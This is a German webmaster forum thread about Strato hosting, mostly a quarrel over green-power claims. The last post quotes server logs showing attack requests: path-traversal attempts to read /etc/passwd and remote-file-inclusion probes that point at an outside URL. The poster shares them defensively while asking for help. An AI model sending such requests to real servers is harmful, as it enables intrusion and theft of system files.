registrieren registriertes Mitglied


Anzeige

Anzeige

Unglaublich: Strato-Server/ Adwords-Gutschein

Hier könnt Ihr mit der Community über sonstige Themen diskutieren und lustige oder unterhaltsame Beiträge teilen.
euroexchange.de
PostRank 6
PostRank 6
Beiträge: 471
Registriert: 02.06.2007, 14:49

Beitrag euroexchange.de » 04.04.2011, 16:34 Unglaublich: Strato-Server/ Adwords-Gutschein

@guppy

Hatte ich erwähnt, das ich noch ganz klein bin ...

Anzeige von:

SEO Telefonberatung bei ABAKUS:
  • Schnelle & kompetente Hilfe
  • Direkte Kommunikation
  • Fachkundige Beratung
  • Geringer Kostenaufwand
Sprechen Sie uns gerne an:
0511 / 300325-0

mannsweib
PostRank 1
PostRank 1
Beiträge: 1
Registriert: 11.05.2011, 10:13

Beitrag mannsweib » 11.05.2011, 10:19 Unglaublich: Strato-Server/ Adwords-Gutschein

guppy hat geschrieben:Strato ist doch jetzt magnetafarbend, sagt alles.
Egal welcher Anbieter, der Service verhält sich immer entgegengesetzt proportional zur Größe des Anbieters.
Besser hätte ich es wohl auch nicht ausdrücken können. ;-)
Besucht meine Seite und spart euch Geld beim Server-Kauf.

Berty

Beitrag Berty » 11.05.2011, 10:31 Unglaublich: Strato-Server/ Adwords-Gutschein

euroexchange.de hat geschrieben:War auch mit einem Server bei all-inkl. und dort sehr zufrieden. Habe mich aber wie gesagt auf Grund der Stromversorgung mit Naturstrom für den Server bei Strato entschieden.
Ist das ernst gemeint? Mir war bisher nicht bewusst, dass die mediale Umprogrammierung wirklich so gut funktioniert und, dass da irgendwer drauf herein fällt. Man wechselt von "all-inkl.com" (mit einem spitzen Service!!!) zu Strato wegen "Naturstrom"????

Alter Schwede ..... da fehlen mir echt die Worte!!!

Kopfschüttelnde Grüße
Zuletzt geändert von Berty am 11.05.2011, 11:06, insgesamt 1-mal geändert.

Synonym
PostRank 10
PostRank 10
Beiträge: 3709
Registriert: 09.08.2008, 03:55

Beitrag Synonym » 11.05.2011, 11:05 Unglaublich: Strato-Server/ Adwords-Gutschein

Ist das ernst gemeint?
Sicherlich. Und wo nimmst Du Dir eigentlich das Recht her, anderen Ihre Meinung / Einstellung in Frage zu stellen?

Ich bin bei Strato - und zufrieden. Punkt.

Berty

Beitrag Berty » 11.05.2011, 11:14 Unglaublich: Strato-Server/ Adwords-Gutschein

Woher ich mir das Recht nehme? Das nennt sich "Meinungsfreiheit" .... falls Du das noch nicht kennen solltest.

Und, dass Du (und andere) bei Strato zufrieden sind, stelle ich überhaupt nicht in Frage - allerdings ist für mich der Wechsel wegen "Naturstrom" (allein schon die lustige Bezeichnung zeigt einen Mangel an Verständnis) schon mehr als grenzwertig. Und noch mehr wenn man deswegen von All-inkl wegzieht.

Das zeigt einfach, dass viele Mitbürger so extrem leicht zu beinflussen sind, dass einem Angst und Bange werden kann, vor allem, wen man bedenkt, dass das bei Wahlen auch so einfach funktioniert. Da will ich garnicht weiter drüber nachdenken ....

Nachtrag:
Und wenn ich schon den Begriff "Naturstrom" hören muss ... (er meint wohl eher CO2-neutralen Strom) dann stellt sich mir die Frage ob Strato auf dem Dach eine RIESEN Solaranlage installiert hat und ob die Strato-Mitarbeiter, in der Nacht, in den Keller laufen und ihre Holzpellet-Anlage anwerfen um damit Strom zu gewinnen. Oder haben sie etwa ein privates Wasserkraftwerk installiert? Oder kommt der Strom weiterhin aus der Steckdose - sie haben bei ihrem Stromanbieter zwar einen "Öko-Tarif" gebucht - der Strom ist aber trotzdem aus dem Kohle- oder Gaskraftwerk oder wurde etwa eine neue, eigene Stromleitung bis zum nächsten Windkraftwerk gelegt?

Fragen über Fragen ..... aber ich wechsel "auch gleich" .... und dann hänge ich mir nen grünen Anstecker ans Hemd "ich nutze Naturstrom" weil ich ja solch ein "kluges Bürschchen bin" ... da werde ich auf mein Umfeld einen richtig "guten" Eindruck machen.

Vielleicht stell ich mich auch gleich zur Wahl - die Stimme von euroexchange hätte ich sicher schon in der Tasche.

Kopfschüttelnde Grüße

Anzeige von:


Hochwertiger Linkaufbau bei ABAKUS:
  • Google-konformer Linkaufbau
  • nachhaltiges Ranking
  • Linkbuilding Angebote zu fairen Preisen
  • internationale Backlinks
Wir bieten Beratung und Umsetzung.
Jetzt anfragen: 0511 / 300325-0

Synonym
PostRank 10
PostRank 10
Beiträge: 3709
Registriert: 09.08.2008, 03:55

Beitrag Synonym » 11.05.2011, 12:42 Unglaublich: Strato-Server/ Adwords-Gutschein

Woher ich mir das Recht nehme? Das nennt sich "Meinungsfreiheit" .... falls Du das noch nicht kennen solltest.
Doch, das kenne ich sehr gut... Du hast aber keine Meinung gesagt, sondern Dich direkt auf die Kunden bezoge, an denen rumgenörgelt und gesagt, dass die alle mit Elektroschockern behandelt werden sollen (so in etwa). Aber genau diesen Teil hast Du vor Deiner Antwort entfernt.
Oder haben sie etwa ein privates Wasserkraftwerk installiert?
Nee, die haben den Strom von denen: www.naturenergie.de

Berty

Beitrag Berty » 11.05.2011, 12:54 Unglaublich: Strato-Server/ Adwords-Gutschein

Synonym hat geschrieben:
Aber genau diesen Teil hast Du vor Deiner Antwort entfernt.
Ja - das stimmt denn es war etwas zu viel "des Guten" - trotzdem hat sich an meiner Meinung nichts geändert.
Synonym hat geschrieben:Nee, die haben den Strom von denen: www.naturenergie.de
Ah ja - die haben also ein extra Kabel (vom Wasserkraftwerk) zum Strato-Rechenzentrum verlegt und der Strom der bei Strato aus der Steckdose kommt, ist hundertprozentig nur von www.naturenergie.de ? Aha - haben die eine Möglichkeit gefunden den Strom "zu verschlüsseln" damit er nur zu ihren Kunden gelangt und niemand anders ihren "Naturstrom" konsumieren kann? Und der Strom ist natürlich nicht durch Kohle/Gasstrom "verunreinigt"? Dann erkläre mir doch bitte wie das funktionieren soll.

Aber Hauptsache da steht irgendwas von "Natur/Öko" und schon fallen alle Schafe dieser Welt massenweise darauf rein und sind "glücklich", dass sie endlich "Öko sind".

Kopfschüttelnde Grüße

Synonym
PostRank 10
PostRank 10
Beiträge: 3709
Registriert: 09.08.2008, 03:55

Beitrag Synonym » 11.05.2011, 14:49 Unglaublich: Strato-Server/ Adwords-Gutschein

Was willst Du eigentlich? Keiner sagte, dass der Strom in der Leitung sortenrein ist! Nur wenn man den Naturstrom erst gar nicht kauft, dann landet da auch immer weniger im Netz. Und wer den letztendlich "nutzt" ist ja egal. Vielleicht hat grad Dein Rechner den Strom, den Strato bezahlt hat.

Und natürlich kann man damit werben, wenn man die entsprechende Menge an Strom bei so einem Anbieter einkauft. Dass der nicht bei einem direkt in der Steckdose ankommt weiß jeder, der nicht ganz doof ist. Darüber braucht man also auch nicht diskutieren. Und zur Info... Atomstromanbieter haben früher genauso geworben!

Und, Deine Beispiele.... Leute, die eine Solaranlage auf dem Dach haben nutzen den Strom in aller Regel auch nicht selbst, der wird eingespeist und der Haushalt hängt am Netz wie jeder andere auch.

autoren-gesucht!
PostRank 2
PostRank 2
Beiträge: 59
Registriert: 27.10.2010, 11:07

Beitrag autoren-gesucht! » 11.05.2011, 14:58 Unglaublich: Strato-Server/ Adwords-Gutschein

Ich finde es gut, wenn jemand sich dazu entschließt, den Ökostrom zu unterstützen! Ich würde meinen Provider deshalb nicht wechseln, aber wenn ich so oder so einen neuen bräuchte, warum denn nicht?

Dass es keine direkte Leitung gibt, ist ja wohl klar. Man hat doch arg den Eindruck, du gehörst zur Atomlobby oder so 0X . Aber genau diese Argumente sind die, die immer mehr Leute zu Ökostrom wechseln lassen - immer auf anderen 'rumhacken, aber selbst nichts verbessern.

Auch mit kleinen Schritten bewegt man sich vorwärts und das Unterstützen von Ökostrom ist sicherlich so ein kleiner Schritt - aber in die richtige Richtung!

Berty

Beitrag Berty » 11.05.2011, 15:38 Unglaublich: Strato-Server/ Adwords-Gutschein

autoren-gesucht! hat geschrieben:Auch mit kleinen Schritten bewegt man sich vorwärts und das Unterstützen von Ökostrom ist sicherlich so ein kleiner Schritt - aber in die richtige Richtung!
Ihr fallt einfach nur auf diverse Unternehmen herein die sich, weil es gerade hipp ist und gute Gewinne verspricht, ein bißchen Ökostrom (der kein Ökostrom ist) dazukaufen und sich anschließend irgendein grünes Ökosiegel verpassen um danach als "grüne Retter" auftreten zu können.

Und abends sitzen die Verantwortlichen in Ihren "Stübchen" und lachen sich, über die dämlichen Kunden, schlapp. Aus vielen Unternehmn kann man dieses Gelächter meilenweit hören.

Genau so läuft das!

Aber was rede ich .... bucht ruhig euren Ökostrom (der keiner ist) und pappt euch einen grünen Anstecker ans Hemd.

Und das Beispiel mit den Solaranlagen vieler Menschen, die den Strom einspeisen aber gleichzeitg Atomstrom verkonsumieren, zeigt doch worum es eigentlich nur geht.

Es geht nicht um "Öko" sondern um "Geld machen". Und wer dann zu einem Unternehmen wechselt weil es "Pseudo-Öko" ist, zeigt einfach, dass er von Tuten und Blasen keine Ahnung hat und einfach nur ein ferngesteuertes Schaf ist.

Aber da die Schafe so zahlreich sind, überlege ich mir gerade ob ich in nächster Zeit nicht auch was als "Öko" verkaufe - das scheint ja richtig gut zu laufen. Da muss ich mir mal was überlegen ... ich bin dann auch "Öko"! Endlich ....

Synonym
PostRank 10
PostRank 10
Beiträge: 3709
Registriert: 09.08.2008, 03:55

Beitrag Synonym » 11.05.2011, 19:35 Unglaublich: Strato-Server/ Adwords-Gutschein

Und das Beispiel mit den Solaranlagen vieler Menschen, die den Strom einspeisen aber gleichzeitig Atomstrom verkonsumieren, zeigt doch worum es eigentlich nur geht.
Richtig, das zeigt es und, dass Du keine Ahnung von dem hast, was Du eigentlich schreibst! Ob die das nun einspeisen oder nicht ist scheiß egal (bringt in dem Fall mehr Geld, aber das ist nicht der Punkt). Fakt ist: Würden die Energiemengen nicht so erzeugt werden, dann müssten sie per AKW kommen, ganz einfach. Und die 15% die in BY aktuell aus regenerativen Energien kommen sind auch gemischt mit anderen, müssten aber komplett per AKW erzeugt werden, wenn dem nicht so wäre.
über die dämlichen Kunden,
Danke !
zeigt einfach, dass er von Tuten und Blasen keine Ahnung hat
Jedenfalls mehr als Du!
überlege ich mir gerade ob ich in nächster Zeit nicht auch was als "Öko" verkaufe
Wickel Dich doch in eine Zeitung ein und rauche Dich dann selbst...

Du hast keine Meinung.... Da zählt auch keine Meinungsfreiheit... Du hast nur Unterstellungen ohne jeglichen fachlichen Bezug oder belegbare Nachweise.

Nach Deiner bescheidenen Logik kann ich auch sagen, dass Du kein Atomstrom nutzt, sondern welchen aus Kohlekraftwerken, denn der ist da auch drinnen.

Hattest Du eigentlich schon was zum eigentlichen Thread gesagt... Nee... Hast wohl keine Ahnung von oder konntest nicht lästern oder wie?

euroexchange.de
PostRank 6
PostRank 6
Beiträge: 471
Registriert: 02.06.2007, 14:49
Kontaktdaten:

Beitrag euroexchange.de » 02.03.2014, 11:40 Unglaublich: Strato-Server/ Adwords-Gutschein

Seit Freitag den 28.02.2014 exakt um 23:00 Uhr sind meine Domains auf dem Strato Managed Server nicht bzw. sehr schlecht zu erreichen.

Serverlast scheint relativ hoch auch wenn ich die Domains abschalte.

Kurz vorher sagen die Serverlogs das hier:

213.158.82.0 - - [28/Feb/2014:23:23:39 +0100] "GET /kipper20/index.php?configfile=../../../../../../../../etc/passwd%00 HTTP/1.0" 302 211 "-" "-"
213.158.82.0 - - [28/Feb/2014:23:23:08 +0100] "GET /index.php?cat=10_Willkommen&page=../../../../../etc/passwd%00 HTTP/1.0" 200 14361 "-" "-"
213.158.82.0 - - [28/Feb/2014:23:21:18 +0100] "GET /index.php?adduser=true&lang=../../../../../../../../etc/passwd%00 HTTP/1.0" 301 14354 "-" "-"
213.158.82.0 - - [28/Feb/2014:23:23:50 +0100] "GET /page.php?page=../../../../../../../../etc/passwd%00 HTTP/1.0" 302 211 "-" "-"
213.158.82.0 - - [28/Feb/2014:23:40:01 +0100] "GET /index.php?m=../../../../../../../../etc/passwd%00 HTTP/1.0" 301 14314 "-" "-"

Kurz darauf kamen dann die hier:

213.158.82.0 - - [28/Feb/2014:23:50:23 +0100] "GET /DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]=https://www.google.com/humans.txt?
213.158.82.0 - - [28/Feb/2014:23:50:28 +0100] "GET /DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]https://www.google.com/humans.txt? HTTP/1.0" 302 211 "-" "-"
213.158.82.0 - - [28/Feb/2014:23:50:44 +0100] "GET /Dir_phNNTP/article-raw.php?file_newsportal=https://www.google.com/humans.txt? HTTP/1.0" 302 211 "-" "-"
213.158.82.0 - - [28/Feb/2014:23:50:54 +0100] "GET /DynaTracker_v151/includes_handler.php?base_path=https://www.google.com/humans.txt? HTTP/1.0" 302 211 "-" "-"
213.158.82.0 - - [28/Feb/2014:23:51:15 +0100] "GET /Exophpdesk_PATH/pipe.php?lang_file=https://www.google.com/humans.txt? HTTP/1.0" 302 211 "-" "-"

und einige mehr in diesem Muster. IP´s habe ich bereits per .htaccess gesperrt.

Seitdem habe ich per Ftp auf meinem Managed Server Zugriff bis auf Rootebene. Vorher gings nur bis htdocs runter.

Strato mit seinem 24/7 Service hat am Wochenende leider keinen im Rechenzentrum der mal gucken oder den Resetknopf drücken kann. Ihr hattet mich ja gewarnt.

Jemand eine Idee?

Antworten
  • Vergleichbare Themen
    Antworten
    Zugriffe
    Letzter Beitrag